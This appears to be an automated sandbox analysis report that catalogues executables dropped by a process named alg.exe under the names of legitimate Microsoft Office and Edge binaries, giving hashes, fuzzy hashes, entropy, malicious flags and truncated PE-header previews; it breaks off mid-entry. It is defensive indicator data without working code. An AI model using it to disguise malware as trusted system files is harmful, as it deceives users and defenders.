SHA1:	B1ABAE6EC0117A85EA95AEAE6D310A64B1906BCA
SHA-256:	28DE239FE93399E4ED4742F041403DC817420273DCAB6688B1E6EE90F29C1CE8
SHA-512:	A62D84CD889075E6B3D5ED54CD45DA76E1D03102693570ECC7166114391693097D9C99A605BF41DD816DB242DC64CAE47037C1550B5392EA51B4AC958BAC2AA0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................#.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.302703349511634
Encrypted:	false
SSDEEP:	12288:GNmt0LDILi21FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:1LiusqjnhMgeiCl7G0nehbGZpbD
MD5:	17D3EDE12FE13CF6EF4E49A84FA00BA1
SHA1:	C8A3F4A504B7E18D7C974CCA75A7836552D37A04
SHA-256:	D9675C950713FA834D176ABA80987A3F8C368A814FAD463ACC0BFF93FCD3AF44
SHA-512:	E0D3DE7D62C1D24BBAE3428DC316E0D53632B440534F194ABCF8E46070BD5FC536A58B06EEF775AD2B5D5A63B3A9F122F4114B1C8B21E5206DEE6799E685D99D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................&........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.302697926511958
Encrypted:	false
SSDEEP:	12288:MNmt0LDILi21FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:zLiusqjnhMgeiCl7G0nehbGZpbD
MD5:	22BD9999D9022195EA3D31717188A8AA
SHA1:	8CC7FB7A9C1945814622A6D82A95F886EA15CA0F
SHA-256:	F6C35EF7B30A838B09C2BEF7B8F94C48BCA866A538C822CD51AEC208E7F82DFA
SHA-512:	D2AFAF87DDAE1BE24596D08A721754FBF6FCAED7C0DAF90E48F17567C3677C4F5F79D77C9A5E1B8E98EC12562DACCA34659B508E6941BCF9610ED5EAFBD9F42B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1343488
Entropy (8bit):	5.235658451278683
Encrypted:	false
SSDEEP:	12288:ojuozQMGNUbTCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:kfusqjnhMgeiCl7G0nehbGZpbD
MD5:	77C167AD336D79F989124C5877CF6C99
SHA1:	5C066F0D72B47CA408264A82EAFEFDE2AD3756FA
SHA-256:	A029AD7E3656F688C7E12D0DC77D0F599B549BAEA41B599142E8BE7595AA5C6C
SHA-512:	9FCC004CF6EB275A100BAE60E8C53736EC45BE49A5C84DBC137DE7D8E81DFAF675CBAFA2384B0267238CC11DEAE5BA806E8005A2A4E6A9ED451A633B2CC695C8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1496064
Entropy (8bit):	5.577415211679362
Encrypted:	false
SSDEEP:	24576:1bUO42i/EnsqjnhMgeiCl7G0nehbGZpbD:1J7Dmg27RnWGj
MD5:	B8B867600A23BDAB062EB66312BE5AB3
SHA1:	358EDFE3D1DF810B7173593B1CC5BCEE57B3B00F
SHA-256:	661C10581C514CBF0623550A6B5F955B56F4D0904C5753E958364101A8C129D6
SHA-512:	A5124DA461EC9DC79D4D64EB9DD1D17887ED8DF72B052AC453587CCA66629EF63AAC436F51731C982EA062940F07876BBB95BFE96FDB355FCEF46283FC57E4CD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.......................... .......g........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961833971892183
Encrypted:	false
SSDEEP:	1572864:KLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:uicZmsR3Lo/cnLe
MD5:	98CAFAB2F113B522A7BB89E05B88A05E
SHA1:	28FF3A0837A051A42F7902E49DFF09DCED9DB66A
SHA-256:	B094ADD95BB4F9DFEA78180C9585604303A013CE705BBA8E79AC14D79FAEE2B3
SHA-512:	10FD8F2B477D8F39B8D463628A64E599EB3AC865080810D1F745EFD9FB47B68696A55F9F9962FA068D56ACB936128D1A455B741B64F2BDB7CF604A9359DFD152
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......w$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.811007163589182
Encrypted:	false
SSDEEP:	98304:8lkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pL6D527BWG:2kkCqaE68eV+0ynE6L6VQBWG
MD5:	0D76768336CA48796A974AE6A9F05092
SHA1:	17C75E89C57378FAF7B25A40EDB14DBDCA372CAB
SHA-256:	B5FB3D24EB1DE059F610A91C27F1808A5EF1EED157E4DB8A5C4FFBEF3B29D5F4
SHA-512:	4FF83A6F1003207B509B741FC7B01A69E9230B0945240CF7439B40470CBC4A65822EE9CF57A44805CC49CAF3A8176795058648B6D8FB055DF76B1969B3543BF0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL.....U.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1657344
Entropy (8bit):	5.635125826829887
Encrypted:	false
SSDEEP:	24576:XE8DMeflpnIOvYUEsqjnhMgeiCl7G0nehbGZpbD:XtDD9pnIOqDmg27RnWGj
MD5:	A15474375CBE856177F7F370C36E5AF0
SHA1:	C97D67F2FFB88FCA7E27C518DDC0C5E300A3A7DC
SHA-256:	28D6EEA04B2E83CFAAA0D0E53DFE51B2623F520FD9BDFEAE5B9498ADC8A75EFA
SHA-512:	DF0DCE5E063697D637F1B8E41C5E8C5324A066F026993EB470E7F8D2974F2080C22E1B1B5F9CDB99CE8FAAE7134C55142D62CBF7E8838AD1AB71F0ACA8AC475A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................[.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.748476536305257
Encrypted:	false
SSDEEP:	49152:jB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E9Dmg27RnWGj:3HzorVmr2ZkRpdJYolbD527BWG
MD5:	7F8B2B40D534B053FEED435682EA5691
SHA1:	22CAF17DF6E674189333B2394B0AF8A464356151
SHA-256:	95603E0D488543691FC71324B52B36A4FDDC979AC64E3D144F98F1FC4014733F
SHA-512:	9A6AE05B3C471208D506FC372FDE51114FB6A29E48CA1E99D751C540C5153A572B07E0A35009B9EE9914A60F7F9333AE81D255313AA9E3F60CFAF2D9D110DF9E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238528
Entropy (8bit):	5.146938777215215
Encrypted:	false
SSDEEP:	12288:M3w1uVdSEjWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:MEyTWsqjnhMgeiCl7G0nehbGZpbD
MD5:	1506033DB3D411F72A87BC7056DBD805
SHA1:	33BEB9B24EB6E45D39E5E57A5DE66667140AAE35
SHA-256:	E6A6A95AC39E1BC4B12FA48E846648181594BEFCA1D51E61A30B4A951EBAF871
SHA-512:	8AF8374C90F473719A11AD1D857526F3DA12D73580A0676F5598FDAF5361635FA448E7F4CF961E8081070E76AB49336674740EB6A6DAE886701F780DBD033E8E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......~..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.049979043869582
Encrypted:	false
SSDEEP:	49152:XhDdVrQ95RW0YEHyWQXE/09Val0GbDmg27RnWGj:XhHYW+HyWKoD527BWG
MD5:	350F873C39FAF143D500811678A86FC0
SHA1:	E327F989DEA4913CCFB35689E4DE3544A017FA95
SHA-256:	947FA11507B5B6084AAC81F54954367B661C7711B2F16B2E313B897961B7A394
SHA-512:	0878B25D6899B54B6B63814932314B3C7F59798ED8B461847D0F19E8DD60B3115817833048FC241C35DC046E7FECDA19C6B941E3C55F47F303214285F3A5BD64
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......[$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.158487438855496
Encrypted:	false
SSDEEP:	24576:R70E0ZCQZMiU6Rrt9RoctGfmddJsqjnhMgeiCl7G0nehbGZpbD:V0EzQSyRPRoc1RDmg27RnWGj
MD5:	1A3ECF6448A542079F6C323D1EAE1542
SHA1:	92E53A39E07976E327B04EF76A844189BD3BC66E
SHA-256:	B128ACA6F7827529D6D1995D27BE25EF26960F6AB870DF9D2F5CE8FBC6DDB319
SHA-512:	7832B3940F8A3F816BFAA7D0F213252F8BFBA61F609212C17EC84A5CF8033E2596C772002FA1E1DE2AC338A82B4EFD8A86832685A907455F137EBBC902A4C74F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......(.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145481116477004
Encrypted:	false
SSDEEP:	24576:3iD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:yD2VmAyiwIb8boQdDmg27RnWGj
MD5:	84E30E94411FBAAB9C0711C225B51F8B
SHA1:	87C0238DFE2F22DFA5243E20CE1977E67922330D
SHA-256:	A73E85CC4D7D4771877A2B312F0AD5C1496E65B743097F0378848F4609018C24
SHA-512:	485F9C1EE7459B2FCF93C5E9BDFB4ACD8654052CF9034B184BB398D5CEA66A8F75F980E29BA385A1B2CC6A80505BF2F2C819E802734E981ED62DB02F42B63C6E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p....../}.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.950751488485539
Encrypted:	false
SSDEEP:	49152:7fD3zO9ZhBGloizM3HRNr00FDmg27RnWGj:zDaalxzM00FD527BWG
MD5:	C7477F7C2918D70A5C50E5379F47A4DE
SHA1:	A48C5E196C7FDE4A6F03DD89AB7400EA03B4F13A
SHA-256:	7C91BF55C4F3F7E58748AE26405BE93244C17AC7CAF1F96470009402C949BD2C
SHA-512:	6238B06F517916B7BFDC5A057F8C57C040EA1AC360307836B576997ECAAF7CBA3F57EE7639619D52A4E59755638CBEC0A40229A155E99E46E36B2871EE5C19F0
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.8246145886606
Encrypted:	false
SSDEEP:	49152:mTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhCDmg27RnN:5I72LvkrDpbxJRoIMND527BWG
MD5:	2D4B0B132F7E5B14381B0EB9AC267CF3
SHA1:	427FAC13A22BE8AFE5C511157650DF5B9DC248A9
SHA-256:	F6C4CE00BE60B0F28106A77385EDF73E2C2781EA8AA31B97FA5BD3E02FDB3CA8
SHA-512:	049417D00377DBC222BACA53E0216A30EF8E4450CA8BD89BDC109AEEBBD87025EE8BE164E0772295CC316D369F45ADF62063E06FBDE8B12189FEB565B7496085
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.0972396763181225
Encrypted:	false
SSDEEP:	24576:5W9Jml9mmijviMnF+ZxmQWcbLw8V5sqjnhMgeiCl7G0nehbGZpbD:5Wnm5iOMkjmQWkV9Dmg27RnWGj
MD5:	99CF4B258B255D86EBB1231F123D70A9
SHA1:	0161490A491222D30E98942A3DC8086118DA623F
SHA-256:	1AA22FA550CBBE570FBF0BF970275DD20802B114D1E1CB2ADA5F01EBD30DA7E0
SHA-512:	70DB0F48BC84063881413F86288AA45B425B5C48BB88542D2565BA9C43AE1B7F24690C8FCBF0B8A23F11026AF7ADF6FA021B92BA9A6189EE737A6FA53F0ADBF0
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....^. ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166365566932989
Encrypted:	false
SSDEEP:	24576:+wNHwoYhua6MtjRO4qbBJTY6mY1uIgvsqjnhMgeiCl7G0nehbGZpbD:+wNPdQO7BJTfmE4Dmg27RnWGj
MD5:	C2CE33FEDE5FE50E3E6E9255F54CAE21
SHA1:	B07BADAE3BEF23CEB6A1E536EED547B31DB7EBCF
SHA-256:	94841FB857DE87D2222417CCFCD4C492252C2877542D2DAA9796C0B6526AB00B
SHA-512:	C730DFB9E53DDA7F285210359E4FF7373B6B9A3125A64E89567CC61F66FA39A329CEA5D677CC744AFB97107979953B90133CB0DBEA34C701A3A72BA71E46AEDF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.14548292508709
Encrypted:	false
SSDEEP:	24576:PiD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:KD2VmAyiwIb8boQdDmg27RnWGj
MD5:	6B558F127018715F6EDBAB9A5CFF4EE6
SHA1:	8B1A8FF318B1C7BAEB754CC2503CF0B4CCA2DAAD
SHA-256:	FDF0217D9B69882B9FC78BD0C34EA5D771578CBEB4B4B9E5581A78EA704B9A4F
SHA-512:	2A718AF79DC798E3C610191D5AD7ABBA12161EC3DE623183201F1846DB8DEE0D36275982E91412C8FC163FBF80A1D844E3D4FFAF9FF790A1133D6C054C3169E1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166362248655182
Encrypted:	false
SSDEEP:	24576:dwNHwoYhua6MtjRO4qbBJTY6mY1uIgvsqjnhMgeiCl7G0nehbGZpbD:dwNPdQO7BJTfmE4Dmg27RnWGj
MD5:	784EB26C56EA63B9F56BF1F872E8F293
SHA1:	BEBA7C05D029B31EE42469F7BC49E98C357EB565
SHA-256:	1284FDC470C69E072116AB2093A8DC22D33D4557443B88DBAD63329E8CE5BFE7
SHA-512:	00D74434CFBCAAD238149A5B2B106A1B3545C62616B2A8EDE8BD725E01CA40430384A74127284AE770110BA0698068671F1A4AFEDC569FA662210F63866C15A5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.....................................G.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1325568
Entropy (8bit):	5.141852376601959
Encrypted:	false
SSDEEP:	24576:n4lbht6BHIsqjnhMgeiCl7G0nehbGZpbD:4lNtqH0Dmg27RnWGj
MD5:	E8DC06C24576920B55CC5D4CD4F17AE5
SHA1:	98D8F5D03DD4CE6A3CC52796CFE0C183436C364F
SHA-256:	EA8C044BD5AAFC993BE5E1DC57E7F4312048CE3DBAFF71A651628E7502B601E8
SHA-512:	6ABC4AC48042C56B8292CEC9935D50B3740FD2FC8ACA8C4B86789BDC395C5C141D4E74FCB81C628C58FDA0A93723AD285300BC4B05A972F673E44861259FFAFE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@..................................7......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138857488040084
Encrypted:	false
SSDEEP:	12288:yIkOkTB+wMXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:yIxkTBVMsqjnhMgeiCl7G0nehbGZpbD
MD5:	2CF4B535EB7A177B1D2089CF129186B2
SHA1:	C00949799063E9B0A4B852A831D0AFC3D3A4690D
SHA-256:	A4882A62A35148866615E7AADF5317F34EB0ACC815779641502027E651AC2DFE
SHA-512:	73015EFB7D7D07F236CCECC2D03CA5727698D03F026564D9D6C33C5266F6B7B496E2A6FE94152E246A16E82571618E5365149F9881B192C288938DB78CC9D009
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................&v......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335296
Entropy (8bit):	5.236785726232037
Encrypted:	false
